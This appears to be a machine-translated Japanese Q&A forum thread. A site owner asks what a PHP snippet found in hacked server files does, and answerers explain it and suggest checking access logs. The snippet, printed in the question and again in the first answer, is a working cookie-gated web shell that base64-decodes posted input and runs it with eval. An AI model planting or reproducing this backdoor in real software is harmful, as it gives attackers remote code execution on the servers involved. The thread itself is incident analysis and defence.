0

私たちの Web サーバーでいくつかのハッキング ファイルを見つけました。私はそれらを少し難読化することに成功しました-それらはすべて、次のようなチャンクにデコードされる部分を持っているようです:

if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){if (!empty($_POST['c'])) {echo '<textarea rows=28 cols=80>'; $d=base64_decode(str_replace(' ','+',$_POST['c']));if($d) @eval($d); echo '</textarea>';}echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';exit;}

ただし、このチャンク (上記でデコード) は、通常、より大きなコード スニペットに埋め込まれます。ファイルの 1 つのコード全体をここで共有しました: http://pastie.org/3753704

私はこのコードがどこに向かっているのかをある程度見ることができますが、PHP の専門家ではないことは間違いなく、何を行っているか、または有効にしているのかをより具体的に理解するのに役立つかもしれません。また、誰かがこのハッキングに精通している場合は、その仕組みと、ハッキングのバックドアやその他のコンポーネントがどこに隠されている可能性があるかについての情報が非常に役に立ち、非常に高く評価されます.

他の人がそれを報告しているかどうかを確認するために、コードの一部をグーグルで検索しようとしましたが、次のリンクしか思いつきませんでした: http://www.daniweb.com/web-development/php/threads/365059/hacked-joomla

ありがとう!

4

2 に答える 2

3

Cookie「v」が「d」に設定されている場合、フォームにテキストエリアを表示します。フォームが送信されたら、テキストエリアでコードを実行します。

<?php
if (!empty($_COOKIE['v']) and $_COOKIE['v']=='d'){
    if (!empty($_POST['c'])) {
        echo '<textarea rows=28 cols=80>';
        $d=base64_decode(str_replace(' ','+',$_POST['c']));
        if($d)
            @eval($d);
        echo '</textarea>';
    }
    echo '<form action="" method=post><textarea cols=80 rows=28 name=c></textarea><br><input type=submit></form>';
    exit;
}
?>
于 2012-04-09T05:29:40.187 に答える
0

この特定のハックではありませんが、この投稿のいくつかの提案が役立つ場合があります。具体的には、アクセス ログで問題の発生元がわかる場合があります。

于 2012-04-09T05:51:01.503 に答える